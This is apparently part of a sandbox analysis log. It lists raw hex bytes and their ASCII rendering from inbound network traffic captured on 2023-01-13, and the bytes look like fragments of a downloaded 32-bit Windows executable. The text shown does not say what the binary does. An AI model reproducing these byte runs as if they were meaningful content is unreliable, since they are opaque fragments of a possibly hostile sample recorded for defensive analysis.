                  2023-01-13 15:04:35 UTC87INData Raw: 00 00 00 8b 4c 24 28 31 e1 e8 c3 78 08 00 89 f0 83 c4 2c 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc 8a 44 24 08 8b 4c 24 04 88 81 3c 11 00 00 c3 cc 8b 44 24 0c 8b 4c 24 08 8b 54 24 04 89 8a a0 20 00 00 89 82 a4 20 00 00 c3 cc cc cc cc cc cc cc 8b 44 24 0c 8b 4c 24 08 8b 54 24 04 89 8a a8 20 00 00 89 82 ac 20 00 00 c3 cc cc cc cc cc cc cc 55 53 57 56 83 ec 24 89 cf 8a 44 24 38 89 54 24 20 85 d2 74 0f 8b 97 94 00 00 00 8d 72 01 89 54 24 04 eb 14 8b 97 94 00 00 00 8b b7 28 01 00 00 c7 44 24 04 00 00 00 00 8a 64 24 3c 8b 8f 98 00 00 00 89 54 24 1c 89 4c 24 14 84 c0 74 33 89 74 24 08 c7 04 24 00 00 00 00 c7 44 24 0c 00 00 00 00 84 e4 0f 85 a9 00 00 00 3b 8f 2c 01 00 00 75 7d c7 44 24 14 00 00 00 00 8d 44 24 1c 89 d1 eb 71 80 bf ae 00 00 00 00 74 1a 89 f3 3b 8f
                  Data Ascii: L$(1x,^_[]D$L$<D$L$T$ D$L$T$ USWV$D$8T$ trT$(D$d$<T$L$t3t$$D$;,u}D$D$qt;
                  2023-01-13 15:04:35 UTC95INData Raw: 48 53 50 ff 51 04 83 c4 24 8b 86 5c 10 00 00 8b 08 57 53 50 ff 51 0c 83 c4 0c e9 93 00 00 00 8d 4c 24 40 0f b7 17 8b 86 5c 10 00 00 8b 19 8b 69 04 89 6c 24 0c 89 1c 24 89 5c 24 08 8b 08 89 4c 24 04 8b 5c 24 08 8b 4c 24 0c 51 53 8b 4c 24 38 52 8b 5c 24 48 53 ff 74 24 48 ff 74 24 48 51 ff 74 24 48 50 8b 44 24 28 ff 50 04 83 c4 24 f7 c3 00 00 00 60 74 3c 0f b7 17 8b 86 5c 10 00 00 89 6c 24 0c 8b 0c 24 89 4c 24 08 8b 08 8b 74 24 08 8b 7c 24 0c 57 56 52 ff 74 24 48 ff 74 24 48 ff 74 24 48 ff 74 24 48 ff 74 24 48 50 ff 51 08 83 c4 24 8b 4c 24 14 31 e1 e8 d4 58 08 00 83 c4 18 5e 5f 5b 5d c3 68 ff 16 00 00 68 7e 43 4f 00 68 68 2c 4f 00 e8 7b 50 09 00 83 c4 0c 83 fb 01 0f 84 bb fe ff ff 68 00 17 00 00 68 7e 43 4f 00 68 1e 70 4f 00 e8 5b 50 09 00 83 c4 0c f7 44 24
                  Data Ascii: HSPQ$\WSPQL$@\il$$\$L$\$L$QSL$8R\$HSt$Ht$HQt$HPD$(P$`t<\l$$L$t$|$WVRt$Ht$Ht$Ht$Ht$HPQ$L$1X^_[]hh~COhh,O{Phh~COhpO[PD$
                  2023-01-13 15:04:35 UTC102INData Raw: 88 9e 43 01 00 00 e9 7d 03 00 00 81 fa d4 07 00 00 0f 85 71 03 00 00 88 9e 54 01 00 00 e9 66 03 00 00 89 d8 34 01 88 86 3e 01 00 00 84 db 0f 84 c5 02 00 00 8a 86 cb 10 00 00 e9 c3 02 00 00 c7 86 20 0e 00 00 00 00 00 00 c7 86 2c 0e 00 00 00 00 00 00 c7 86 30 0e 00 00 00 00 00 00 c7 86 34 0e 00 00 00 00 00 00 c7 86 38 0e 00 00 00 00 00 00 80 be f4 10 00 00 00 75 1f 84 db b8 84 00 00 00 ba 50 00 00 00 0f 45 d0 89 f1 ff b6 28 01 00 00 e8 eb f8 ff ff 83 c4 04 88 9e c5 00 00 00 c7 86 a4 00 00 00 00 00 00 00 c7 86 78 01 00 00 00 00 00 00 8b 86 28 01 00 00 8b 8e 2c 01 00 00 8d 50 ff 89 96 a8 00 00 00 8d 79 ff 31 db 85 c9 0f 4f fb 89 96 7c 01 00 00 85 c0 0f 4f d3 89 be 98 00 00 00 89 96 94 00 00 00 c6 86 ae 00 00 00 00 89 f1 31 d2 6a 01 6a 01 e8 f4 c0 ff ff 83 c4
                  Data Ascii: C}qTf4> ,048uPE(x(,Py1O|O1jj
                  2023-01-13 15:04:35 UTC110INData Raw: b2 01 00 83 c4 08 88 46 30 6a 5b 57 e8 90 b2 01 00 83 c4 08 88 46 31 6a 02 57 e8 32 b3 01 00 83 c4 08 89 46 34 6a 5f 57 e8 24 b3 01 00 83 c4 08 89 46 38 6a 60 57 e8 16 b3 01 00 83 c4 08 89 46 3c 5e 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 8d 46 0c 50 e8 92 26 02 00 83 c4 04 8b 06 85 c0 74 0a c7 80 58 10 00 00 00 00 00 00 8b 46 04 85 c0 74 0b 8b 08 6a 00 50 ff 51 30 83 c4 08 8b 46 40 85 c0 74 09 50 e8 30 cf 01 00 83 c4 04 8b 46 2c 85 c0 74 0f 8d 4e 2c 39 48 3c 75 07 c7 40 3c 00 00 00 00 56 e8 51 96 00 00 83 c4 04 5e e9 08 cf 01 00 cc cc cc cc cc cc cc cc 53 56 50 8b 74 24 10 8b 46 3c b1 01 89 0c 24 b3 01 85 c0 74 19 83 f8 02 75 12 8b 46 04 8b 08 6a 00 50 ff 51 2c 83 c4 08 89 c3 eb 02 31 db 8b 46 38 85 c0 74 1f 83 f8 02 75 13 8b 46 04 8b
                  Data Ascii: F0j[WF1jW2F4j_W$F8j`WF<^_Vt$FP&tXFtjPQ0F@tP0F,tN,9H<u@<VQ^SVPt$F<$tuFjPQ,1F8tuF
                  2023-01-13 15:04:35 UTC118INData Raw: 74 24 20 e8 09 92 01 00 83 c4 08 85 db 0f 95 c3 56 e8 bb 91 01 00 83 c4 04 89 d8 83 c4 04 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc a1 6c 1e 50 00 85 c0 75 2c 6a 00 68 f0 e0 41 00 ff 74 24 0c 6a 6e ff 35 e8 0b 50 00 ff 15 6c d5 4f 00 a3 6c 1e 50 00 6a 01 50 ff 15 0c d7 4f 00 a1 6c 1e 50 00 50 ff 15 c0 d6 4f 00 c3 cc cc cc 55 53 57 56 83 ec 20 31 ed 8b 44 24 38 8b 7c 24 34 83 f8 10 0f 84 ed 00 00 00 3d 11 01 00 00 0f 84 d5 00 00 00 3d 10 01 00 00 0f 85 f6 00 00 00 ff 35 7c 77 4c 00 68 64 3f 4e 00 e8 00 a5 01 00 83 c4 08 89 c6 50 57 ff 15 fc d6 4f 00 56 e8 bd af 01 00 83 c4 04 68 20 00 50 00 6a 02 68 92 01 00 00 68 e9 03 00 00 57 ff 15 b8 d6 4f 00 83 3d 74 1e 50 00 00 7e 2a 31 f6 8b 1d b8 d6 4f 00 90 ff 34 b5 78 1e 50 00 6a 00 68 80 01 00 00
                  Data Ascii: t$ V^_[]lPu,jhAt$jn5PlOlPjPOlPPOUSWV 1D$8|$4==5|wLhd?NPWOVh PjhhWO=tP~*1O4xPjh
                  2023-01-13 15:04:35 UTC126INData Raw: 01 00 00 ff 33 55 ff 15 b8 d6 4f 00 89 df 83 f8 ff 74 40 89 c3 6a 00 6a 00 68 8b 01 00 00 ff 37 55 ff 15 b8 d6 4f 00 89 f9 3b 77 04 75 3a 85 db 7e 36 89 d8 83 c0 ff 89 ce 8b 11 89 e9 50 53 89 f3 e8 8b 03 00 00 83 c4 08 bf 02 00 00 00 e9 2f 03 00 00 6a 00 ff 15 70 d6 4f 00 8b 54 24 38 89 fb 31 ff e9 1e 03 00 00 bf 02 00 00 00 3b 71 08 0f 85 55 02 00 00 83 c0 ff 39 c3 0f 8d 4a 02 00 00 89 d8 83 c0 01 89 ce 8b 11 89 e9 50 53 89 f3 e9 de 02 00 00 c6 43 14 01 8b 7e 04 8b 4e 08 8b 46 0c 6a 01 89 44 24 10 50 89 4c 24 10 51 57 ff 15 88 22 50 00 83 f8 ff 0f 84 30 02 00 00 89 f8 31 ff bd 01 00 00 00 be ff ff ff ff 6a 00 ff 74 24 10 ff 74 24 10 89 44 24 1c 50 ff 15 88 22 50 00 89 44 24 04 31 d2 8b 4c 24 0c eb 1f 90 90 90 90 85 ff 0f 44 f9 83 c5 01 83 c6 ff 81 fe 00
                  Data Ascii: 3UOt@jjh7UO;wu:~6PS/jpOT$81;qU9JPSC~NFjD$PL$QW"P01jt$t$D$P"PD$1L$D
                  2023-01-13 15:04:35 UTC134INData Raw: 20 56 e8 ca f3 08 00 83 c4 04 8b 0c 24 8b 7c 24 04 8b 6c 24 0c 8b 94 24 08 01 00 00 01 fa 29 d5 89 ea c1 ea 1f 01 ea d1 fa 01 fa 8b 6c 24 08 8b bc 24 04 01 00 00 01 cf 29 fd 89 ef c1 ef 1f 01 ef d1 ff 01 cf 50 56 52 57 53 ff 15 14 d5 4f 00 b3 01 8b 8c 24 5c 01 00 00 31 e1 e8 f1 bc 07 00 89 d8 81 c4 60 01 00 00 5e 5f 5b 5d c3 8b 3e 85 ff 0f 84 12 ff ff ff 83 7f 10 00 0f 84 08 ff ff ff 89 e8 2b 46 04 8b 94 24 74 01 00 00 c6 82 bc 00 00 00 00 8b 0f 31 db 83 c1 ff 83 f9 07 77 b2 ff 24 8d a4 e8 4c 00 81 bc 24 78 01 00 00 11 01 00 00 0f 85 d1 fe ff ff 89 f8 8b bc 24 7c 01 00 00 c1 ef 10 89 c5 80 78 2d 00 0f 84 50 04 00 00 8d 47 fd 83 f8 01 0f 87 d4 06 00 00 8b 42 34 83 ff 03 0f 85 f8 05 00 00 89 e9 85 c0 0f 85 fa 05 00 00 e9 f8 05 00 00 81 bc 24 78 01 00 00 11
                  Data Ascii: V$|$l$$)l$$)PVRWSO$\1`^_[]>+F$t1w$L$x$|x-PGB4$x
                  2023-01-13 15:04:35 UTC142INData Raw: c4 08 c3 8b 4c 24 04 31 e1 e8 03 9e 07 00 83 c4 08 e9 0b 00 00 00 cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 b8 2c 10 00 00 e8 f2 9d 07 00 a1 34 00 50 00 31 e0 89 84 24 28 10 00 00 c7 44 24 1c 00 00 00 00 c7 44 24 18 00 00 00 00 c7 44 24 14 00 00 00 00 c7 44 24 10 00 00 00 00 8d 44 24 1c 50 68 04 e9 4c 00 6a 01 6a 00 68 14 e9 4c 00 ff 15 40 d5 4f 00 b2 01 85 c0 0f 88 f2 02 00 00 8b 44 24 1c 8b 08 8d 54 24 10 8d 74 24 24 52 68 24 e9 4c 00 56 50 ff 51 10 85 c0 0f 88 cb 02 00 00 8b 44 24 10 8b 08 8d 54 24 20 52 50 ff 51 0c 85 c0 79 08 c7 44 24 20 00 00 00 00 8d 44 24 18 50 68 34 e9 4c 00 6a 01 6a 00 68 44 e9 4c 00 ff 15 40 d5 4f 00 85 c0 0f 88 93 02 00 00 e8 0f 0a 01 00 89 04 24 80 38 00 0f 84 23 01 00 00 31 f6 bb 1e 00 00 00 8b 14 24 eb 38 90 90 90 90 90
                  Data Ascii: L$1USWV,4P1$(D$D$D$D$D$PhLjjhL@OD$T$t$$Rh$LVPQD$T$ RPQyD$ D$Ph4LjjhDL@O$8#1$8
                  2023-01-13 15:04:35 UTC149INData Raw: 00 83 c4 0c 89 c7 6a 00 56 e8 43 4c 01 00 83 c4 08 85 c0 74 46 89 c3 31 ed eb 25 90 90 90 90 90 90 89 1c af 8b 03 89 84 af 00 02 00 00 83 c5 01 55 56 e8 1a 4c 01 00 83 c4 08 89 c3 85 c0 74 1d 83 fd 40 72 dc 6a 77 68 94 35 4f 00 68 54 62 4f 00 e8 3e 76 08 00 83 c4 0c eb c6 31 ed 89 f8 05 00 02 00 00 89 af 00 03 00 00 5e 5f 5b 5d c3 cc cc 57 56 8b 74 24 10 8b 7c 24 0c 85 f6 78 32 39 b7 00 01 00 00 7f 17 68 85 00 00 00 68 94 35 4f 00 68 76 1e 4f 00 e8 f9 75 08 00 83 c4 0c 8b 84 b7 00 fe ff ff ff 70 08 ff 50 04 83 c4 04 5e 5f c3 68 84 00 00 00 68 94 35 4f 00 68 72 14 4f 00 e8 cf 75 08 00 83 c4 0c 39 b7 00 01 00 00 7e b7 eb cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc b8 00 fe ff ff 03 44 24 04 50 e8 91 32 01 00 83 c4 04 c3 cc cc cc cc cc cc cc cc cc cc cc
                  Data Ascii: jVCLtF1%UVLt@rjwh5OhTbO>v1^_[]WVt$|$x29hh5OhvOupP^_hh5OhrOu9~D$P2
                  2023-01-13 15:04:35 UTC157INData Raw: 09 4f 00 57 e8 98 15 02 00 83 c4 0c 89 46 0c c6 40 24 00 68 75 1d 4e 00 68 7f fa 4d 00 68 8a 2c 4e 00 53 e8 29 09 02 00 83 c4 10 89 c7 6a 00 e8 8d 04 02 00 83 c4 04 89 44 24 10 56 e8 80 04 02 00 83 c4 04 89 44 24 0c 8b 44 24 10 8b 4c 24 0c 50 51 68 c0 84 42 00 68 a0 14 4e 00 6a 64 6a 68 68 f5 d8 4d 00 57 e8 d6 0c 02 00 83 c4 20 89 46 10 6a 12 6a 12 6a 12 6a 2c 6a 04 57 e8 70 0b 02 00 83 c4 18 68 61 3c 4e 00 68 17 bc 4e 00 57 e8 0d 15 02 00 83 c4 0c 89 c3 c7 40 0c 00 00 00 00 56 e8 1b 04 02 00 83 c4 04 89 44 24 08 8b 44 24 08 50 68 10 85 42 00 68 61 3c 4e 00 6a 00 68 bd cd 4e 00 57 e8 78 15 02 00 83 c4 18 89 c5 c7 40 0c 01 00 00 00 89 58 20 6a 00 e8 e2 03 02 00 83 c4 04 89 45 18 89 6e 14 56 e8 d3 03 02 00 83 c4 04 89 44 24 04 8b 44 24 04 50 68 10 85 42 00
                  Data Ascii: OWF@$huNhMh,NS)jD$VD$D$L$PQhBhNjdjhhMW Fjjjj,jWpha<NhNW@VD$D$PhBha<NjhNWx@X jEnVD$D$PhB
                  2023-01-13 15:04:35 UTC165INData Raw: 02 b8 70 fe 4e 00 b9 3c 13 4f 00 0f 44 c8 83 ff 01 b8 78 fe 4e 00 0f 45 c1 50 53 68 b4 06 4e 00 e8 0c ea 00 00 83 c4 0c 89 c3 50 ff 76 0c e8 ee b2 ff ff 83 c4 08 53 e8 c5 f4 00 00 83 c4 04 68 3c 13 4f 00 6a 00 57 ff 76 34 8b 6c 24 54 55 ff 74 24 54 ff 74 24 54 e8 c5 42 02 00 83 c4 1c 89 c7 50 e8 4a d0 00 00 83 c4 04 85 c0 74 0e 89 c3 57 e8 ab bf 00 00 83 c4 04 53 eb 50 8a 74 24 4c 8a 54 24 48 89 f3 83 c3 5c 89 e9 8b 6c 24 40 85 ed b8 5f 00 00 00 0f 49 c5 89 cd 0f b6 ce 0f b6 d2 ff 74 24 04 ff 76 34 53 51 52 6a 01 6a 00 50 ff 75 00 57 e8 58 46 02 00 83 c4 28 89 06 8b 08 50 ff 51 18 83 c4 04 85 c0 74 20 50 e8 d0 4a 01 00 83 c4 04 89 c6 8b 4c 24 10 31 e1 e8 70 3f 07 00 89 f0 83 c4 14 5e 5f 5b 5d c3 ff 34 24 ff 76 34 e8 cb 26 02 00 83 c4 08 89 46 58 8b 46 08
                  Data Ascii: pN<ODxNEPShNPvSh<OjWv4l$TUt$Tt$TBPJtWSPt$LT$H\l$@_It$v4SQRjjPuWXF(PQt PJL$1p?^_[]4$v4&FXF
                  2023-01-13 15:04:35 UTC173INData Raw: 14 8b 4c 24 0c 31 e1 e8 05 21 07 00 83 c4 10 5e 5f 5b 5d c3 81 fb fe 00 00 00 b9 08 82 4e 00 b8 84 b0 4e 00 0f 44 c1 8b 0c 24 51 50 68 e6 e9 4d 00 68 8a 07 4e 00 ff 76 0c e8 d3 94 ff ff 83 c4 14 8b 17 89 f1 e8 27 00 00 00 eb b5 bb b8 f2 4c 00 b8 c0 f2 4c 00 e9 22 fd ff ff bb b0 f2 4c 00 b8 4c f3 4c 00 e9 13 fd ff ff cc cc cc cc cc cc cc 55 53 57 56 83 ec 08 89 d6 89 cf a1 34 00 50 00 31 e0 89 44 24 04 81 3a fb 00 00 00 0f 85 9e 00 00 00 8b 46 10 83 f8 1f 75 1e 8d 47 6c 8b 4f 6c ff 77 18 ff 77 14 50 ff 51 14 83 c4 0c 81 3e fb 00 00 00 75 7b 8b 46 10 83 f8 27 74 05 83 f8 24 75 6e 31 c9 83 f8 27 0f 94 c1 bd 04 00 00 00 29 cd 83 7c af 20 01 77 50 31 c9 83 f8 27 0f 95 c1 8d 1c 49 83 cb 24 66 c7 44 24 01 ff fc 88 5c 24 03 8b 07 8b 08 8d 54 24 01 6a 03 52 50 ff
                  Data Ascii: L$1!^_[]NND$QPhMhNv'LL"LLLUSWV4P1D$:FuGlOlwwPQ>u{F't$un1')| wP1'I$fD$\$T$jRP
                  2023-01-13 15:04:35 UTC181INData Raw: bf 01 00 00 00 83 bc 24 28 10 00 00 00 0f 88 ac 06 00 00 8b 1d 78 77 4c 00 f6 c3 03 0f 85 8f 06 00 00 83 bc 24 28 10 00 00 00 0f 85 e8 f3 ff ff 6a 01 6a 33 ff b4 24 34 10 00 00 e8 d1 9f 00 00 83 c4 0c 68 b1 ac 4e 00 56 e8 b3 32 08 00 83 c4 08 bf 01 00 00 00 85 c0 0f 85 8b f9 ff ff f6 c3 02 74 33 e9 f4 00 00 00 bf 01 00 00 00 83 bc 24 28 10 00 00 00 0f 88 44 06 00 00 f6 05 78 77 4c 00 02 0f 85 d4 00 00 00 83 bc 24 28 10 00 00 00 0f 85 82 f3 ff ff 6a 01 6a 17 ff b4 24 34 10 00 00 e8 6b 9f 00 00 83 c4 0c bf 01 00 00 00 e9 36 f9 ff ff bf 01 00 00 00 83 bc 24 28 10 00 00 00 0f 88 f9 05 00 00 f6 05 78 77 4c 00 02 0f 85 de 05 00 00 83 bc 24 28 10 00 00 00 0f 85 37 f3 ff ff 6a 00 6a 24 ff b4 24 34 10 00 00 e8 e0 9f 00 00 83 c4 0c 68 c2 c8 4e 00 56 e8 02 32 08 00
                  Data Ascii: $(xwL$(jj3$4hNV2t3$(DxwL$(jj$4k6$(xwL$(7jj$$4hNV2
                  2023-01-13 15:04:35 UTC188INData Raw: 00 53 e8 ca 7a 00 00 83 c4 08 b9 02 00 00 00 29 c1 51 68 ea 1a 4e 00 57 e8 44 3e 00 00 83 c4 0c 68 bf 00 00 00 53 e8 a6 7a 00 00 83 c4 08 b9 02 00 00 00 29 c1 51 68 78 e7 4d 00 57 e8 20 3e 00 00 83 c4 0c 68 c0 00 00 00 53 e8 82 7a 00 00 83 c4 08 29 c6 56 68 43 eb 4d 00 57 e8 01 3e 00 00 83 c4 0c 68 c6 00 00 00 53 e8 b3 79 00 00 83 c4 08 0f b6 c0 50 68 0b 1c 4e 00 57 e8 e1 3d 00 00 83 c4 0c 68 c7 00 00 00 53 e8 93 79 00 00 83 c4 08 0f b6 c0 50 68 b3 34 4e 00 57 e8 c1 3d 00 00 83 c4 0c 68 c8 00 00 00 53 e8 73 79 00 00 83 c4 08 0f b6 c0 50 68 f7 eb 4d 00 57 e8 a1 3d 00 00 83 c4 0c 68 ca 00 00 00 53 e8 63 7f 00 00 83 c4 08 50 68 68 e8 4d 00 57 e8 04 40 00 00 83 c4 0c 68 cb 00 00 00 53 e8 46 7f 00 00 83 c4 08 50 68 5b e8 4d 00 57 e8 e7 3f 00 00 83 c4 0c 68 cc
                  Data Ascii: Sz)QhNWD>hSz)QhxMW >hSz)VhCMW>hSyPhNW=hSyPh4NW=hSsyPhMW=hScPhhMW@hSFPh[MW?h
                  2023-01-13 15:04:35 UTC196INData Raw: 55 e8 eb 1f 00 00 83 c4 0c 85 c0 0f 95 c0 0f b6 c0 50 6a 61 53 e8 77 61 00 00 83 c4 0c 6a 00 68 57 17 4e 00 e8 78 52 03 00 83 c4 08 85 ed 74 17 0f b6 c0 50 68 57 17 4e 00 55 e8 b2 1f 00 00 83 c4 0c 85 c0 0f 95 c0 0f b6 c0 50 6a 62 53 e8 3e 61 00 00 83 c4 0c 6a 00 68 93 14 4e 00 e8 3f 52 03 00 83 c4 08 85 ed 74 17 0f b6 c0 50 68 93 14 4e 00 55 e8 79 1f 00 00 83 c4 0c 85 c0 0f 95 c0 0f b6 c0 50 68 89 00 00 00 53 e8 02 61 00 00 83 c4 0c 6a 00 68 37 5c 4e 00 e8 03 52 03 00 83 c4 08 85 ed 74 17 0f b6 c0 50 68 37 5c 4e 00 55 e8 3d 1f 00 00 83 c4 0c 85 c0 0f 95 c0 0f b6 c0 50 68 8a 00 00 00 53 e8 c6 60 00 00 83 c4 0c 6a 01 68 70 19 4e 00 e8 d7 51 03 00 83 c4 08 50 68 70 19 4e 00 55 e8 08 1f 00 00 83 c4 0c 50 68 8b 00 00 00 53 e8 59 61 00 00 83 c4 0c 6a 00 68 aa
                  Data Ascii: UPjaSwajhWNxRtPhWNUPjbS>ajhN?RtPhNUyPhSajh7\NRtPh7\NU=PhS`jhpNQPhpNUPhSYajh
                  2023-01-13 15:04:35 UTC204INData Raw: cc 8b 44 24 04 ff 30 e8 45 82 00 00 83 c4 04 e9 ad 58 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 57 56 8b 7c 24 0c 85 ff 74 05 80 3f 00 75 05 bf 30 fe 4d 00 e8 b7 5d 00 00 89 c6 50 57 e8 3e 33 03 00 83 c4 08 6a 00 ff 36 68 99 fb 4d 00 68 01 00 00 80 6a 00 e8 16 81 00 00 83 c4 14 89 c7 56 e8 4b 5e 00 00 83 c4 04 85 ff 74 12 6a 00 6a 04 6a 01 e8 b9 57 00 00 83 c4 0c 89 38 eb 02 31 c0 5e 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 85 c0 74 0f ff 74 24 08 ff 30 e8 0d 83 00 00 83 c4 08 c3 31 c0 c3 cc cc cc cc cc cc 56 83 ec 08 8b 74 24 18 8b 44 24 10 8b 0d 34 00 50 00 31 e1 89 4c 24 04 85 c0 74 18 89 e1 51 ff 74 24 18 ff 30 e8 36 82 00 00 83 c4 0c 84 c0 74 03 8b 34 24 8b 4c 24 04 31 e1 e8 21 a3 06 00 89 f0 83 c4 08 5e c3 cc cc cc cc cc cc cc cc
                  Data Ascii: D$0EXWV|$t?u0M]PW>3j6hMhjVK^tjjjW81^_D$tt$01Vt$D$4P1L$tQt$06t4$L$1!^
                  2023-01-13 15:04:35 UTC212INData Raw: 07 00 83 c4 08 b3 01 85 c0 74 27 68 84 cb 4e 00 56 e8 eb b5 07 00 83 c4 08 85 c0 74 15 6a 04 68 b4 e2 4e 00 56 e8 b7 bb 07 00 83 c4 0c 85 c0 0f 94 c3 89 d8 5e 5b c3 cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 0c 8b 74 24 20 a1 34 00 50 00 31 e0 89 44 24 08 8b 46 08 83 f8 02 74 67 83 f8 01 75 79 8b 46 0c 85 c0 0f 84 85 00 00 00 8b 48 04 85 c9 74 67 83 f9 02 0f 84 5f 01 00 00 83 f9 17 75 42 8b 40 18 66 83 78 08 00 75 4f 66 83 78 0a 00 75 48 66 83 78 0c 00 75 41 66 83 78 0e 00 75 3a 66 83 78 10 00 75 33 66 83 78 12 00 75 2c 66 83 78 14 00 75 25 0f b7 40 16 3d 00 01 00 00 0f 94 c3 eb 19 68 e2 02 00 00 68 8e 44 4f 00 68 ec 6b 4f 00 e8 ba 7b 07 00 83 c4 0c 31 db 8b 4c 24 08 31 e1 e8 e7 83 06 00 89 d8 83 c4 0c 5e 5f 5b 5d c3 8b 46 10 85 c0 74 06 83 7e 14 00
                  Data Ascii: t'hNVtjhNV^[USWVt$ 4P1D$FtguyFHtg_uB@fxuOfxuHfxuAfxu:fxu3fxu,fxu%@=hhDOhkO{1L$1^_[]Ft~
                  2023-01-13 15:04:35 UTC220INData Raw: 3c b5 08 02 4d 00 03 74 17 68 44 01 00 00 68 e8 4e 4f 00 68 7e 64 4f 00 e8 37 5d 07 00 83 c4 0c 89 34 24 89 5c 24 04 89 e0 6a 00 50 ff 37 e8 ae 38 00 00 83 c4 0c 85 c0 74 05 8b 70 08 eb 02 31 f6 8b 4c 24 08 31 e1 e8 45 65 06 00 89 f0 83 c4 0c 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc 53 57 56 83 ec 0c 8b 74 24 20 a1 34 00 50 00 31 e0 89 44 24 08 83 3c b5 48 05 4d 00 03 74 17 68 43 01 00 00 68 e8 4e 4f 00 68 3c 64 4f 00 e8 c0 5c 07 00 83 c4 0c 8b 5c 24 24 8b 7c 24 1c 83 3c b5 08 02 4d 00 03 74 17 68 44 01 00 00 68 e8 4e 4f 00 68 7e 64 4f 00 e8 97 5c 07 00 83 c4 0c 89 34 24 89 5c 24 04 89 e0 6a 00 50 ff 37 e8 0e 38 00 00 83 c4 0c 85 c0 74 07 8b 70 08 85 f6 75 19 68 4e 01 00 00 68 e8 4e 4f 00 68 90 19 4f 00 e8 5f 5c 07 00 83 c4 0c 31 f6 8b 4c 24 08 31
                  Data Ascii: <MthDhNOh~dO7]4$\$jP78tp1L$1Ee^_[SWVt$ 4P1D$<HMthChNOh<dO\\$$|$<MthDhNOh~dO\4$\$jP78tpuhNhNOhO_\1L$1
                  2023-01-13 15:04:35 UTC227INData Raw: cc 53 8b 4c 24 08 8b 41 08 85 c0 74 1a 8a 5c 24 0c 8b 11 38 5c 02 ff 75 0e 83 c0 ff 89 41 08 c6 04 02 00 b0 01 5b c3 31 c0 5b c3 cc cc cc cc cc cc 57 56 6a 00 6a 20 6a 01 e8 33 fa ff ff 83 c4 0c 89 c7 8d 70 04 83 c0 10 c7 47 10 e0 98 43 00 89 47 18 c7 47 14 40 99 43 00 c7 47 0c 00 00 00 00 c7 07 00 02 00 00 c6 47 1c 00 6a 00 6a 01 68 00 02 00 00 e8 f8 f9 ff ff 83 c4 0c 89 47 04 89 47 08 c6 00 00 89 f0 5e 5f c3 cc cc cc cc cc cc cc 57 56 6a 00 6a 20 6a 01 e8 d3 f9 ff ff 83 c4 0c 89 c7 8d 70 04 83 c0 10 c7 47 10 e0 98 43 00 89 47 18 c7 47 14 40 99 43 00 c7 47 0c 00 00 00 00 c7 07 00 02 00 00 c6 47 1c 01 6a 00 6a 01 68 00 02 00 00 e8 98 f9 ff ff 83 c4 0c 89 47 04 89 47 08 c6 00 00 89 f0 5e 5f c3 cc cc cc cc cc cc cc 56 8b 74 24 08 8b 06 83 c6 fc 85 c0 74 16
                  Data Ascii: SL$At\$8\uA[1[WVjj j3pGCGG@CGGjjhGG^_WVjj jpGCGG@CGGjjhGG^_Vt$t
                  2023-01-13 15:04:35 UTC235INData Raw: 24 00 00 00 00 83 7e 24 00 0f 85 e1 fb ff ff 8b 44 24 0c 89 28 c7 45 00 00 00 00 00 56 e8 9f db ff ff 83 c4 04 e9 c6 fb ff ff 90 90 90 90 90 90 90 8b 44 8f 08 83 78 28 00 74 40 89 c2 90 90 90 90 89 d1 8b 52 04 85 d2 75 f7 8b 49 24 8b 54 24 08 89 4c 97 24 31 d2 89 c6 e9 cd fa ff ff 90 90 90 8b 48 28 85 c9 0f 85 b0 fa ff ff 8b 48 24 e9 a8 fa ff ff 31 c9 e9 06 01 00 00 8b 4c 8f 24 89 4e 28 8b 48 04 89 4e 0c 8b 50 14 89 56 1c 85 c9 74 02 89 31 8b 48 24 89 4e 2c 8b 48 08 89 4e 10 8b 50 18 89 56 20 85 c9 74 02 89 31 50 e8 0f db ff ff 83 c4 04 8b 46 18 03 46 14 03 46 1c 03 46 20 83 7e 24 01 83 d8 ff 83 7e 28 01 83 d8 ff 83 7e 2c 01 83 d8 ff 8b 54 24 08 89 44 97 14 83 fa 01 7f 45 89 d0 90 90 90 90 90 90 90 90 90 90 90 90 8b 4c 87 28 85 c9 74 23 89 4c 87 24 8b 4c
                  Data Ascii: $~$D$(EVDx(t@RuI$T$L$1H(H$1L$N(HNPVt1H$N,HNPV t1PFFFF ~$~(~,T$DEL(t#L$L
                  2023-01-13 15:04:35 UTC243INData Raw: 90 8d 5a fd 81 e3 fc 00 00 00 66 3b 8c 5d 0c 04 00 00 74 ad 8d 5a fe 81 e3 fd 00 00 00 66 3b 8c 5d 0c 04 00 00 74 9a 8d 5a ff 81 e3 fe 00 00 00 66 3b 8c 5d 0c 04 00 00 74 87 0f b6 da 66 3b 8c 5d 0c 04 00 00 0f 84 76 ff ff ff 83 c2 04 81 fa 23 01 00 00 75 ab e9 70 ff ff ff 31 c0 8b 34 24 eb 28 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 81 cf 00 dd 00 00 66 89 7c 45 0c 83 c0 01 3d 00 01 00 00 0f 84 21 01 00 00 0f b7 4c 45 0c 89 ca 81 e2 00 fe 00 00 81 fa 00 dc 00 00 74 dd ba 23 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 8d 7a fd 81 e7 fc 00 00 00 66 3b 8c 7d 0c 04 00 00 74 ad 8d 7a fe 81 e7 fd 00 00 00 66 3b 8c 7d 0c 04 00 00 74 9a 8d 7a ff 81 e7 fe 00 00 00 66 3b 8c 7d 0c 04 00 00 74 87 0f b6 fa 66 3b 8c 7d 0c 04 00 00 0f 84 76 ff ff ff 83 c2 04 81
                  Data Ascii: Zf;]tZf;]tZf;]tf;]v#up14$(f|E=!LEt#zf;}tzf;}tzf;}tf;}v
